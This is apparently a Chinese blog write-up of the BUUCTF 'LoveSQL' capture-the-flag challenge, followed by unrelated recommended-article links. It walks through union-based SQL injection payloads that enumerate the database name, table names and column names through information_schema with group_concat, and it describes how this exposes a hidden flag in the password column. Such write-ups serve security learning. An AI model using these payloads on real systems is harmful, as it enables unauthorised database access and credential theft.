BUU10 [极客大挑战 2019]LoveSQL1

万能用户名(密码随便)

登录进去以后发现是这个东西,然而并没有什么卵用

然后就开始爆破数据库名字--表名--列名

注意:这道题需要将所有的表名都爆出来,需要在payload里头写 group_concat(),否则页面只会显示那个没有flag的假表名

1.1' union select 1,2,database() #

(爆出来数据库名字是 geek)

2.1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek' #

(爆出来geek库中的表名是geekuser(假的)和l0ve1ysq1)

3.1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1'#

(爆出来有id(永远都是1)和username和password还有flag)

这个题最大的坑在于flag藏在最终的password中,而必须要用group_concat()去显示完整的行,否则就看不见

相关推荐
婪苏(Python学习ing)2 分钟前
MySQL 与 Redis 基础入门:从安装到核心操作
数据库
幻灭行度43 分钟前
通过redis_exporter监控redis cluster
数据库·redis·缓存
Wang's Blog1 小时前
Nestjs框架: 基于Mongodb的多租户功能集成和优化
数据库·mongodb·多租户
Edingbrugh.南空1 小时前
Aerospike架构深度解析:打造web级分布式应用的理想数据库
数据库·架构
技术卷2 小时前
详解力扣高频SQL50题之1084. 销售分析 III【简单】
sql·leetcode·oracle
Cxzzzzzzzzzz3 小时前
数据库索引详解:原理、设计原则与应用场景
数据库·mysql
Alla T3 小时前
【通识】数据库
数据库·oracle
烙印6013 小时前
MySQL的底层原理--InnoDB数据页结构
java·数据库·mysql
betazhou4 小时前
SQL server 2019删除重建用户
数据库·sql server
MickeyCV5 小时前
MySQL数据库本地迁移到云端完整教程
服务器·数据库·mysql·oracle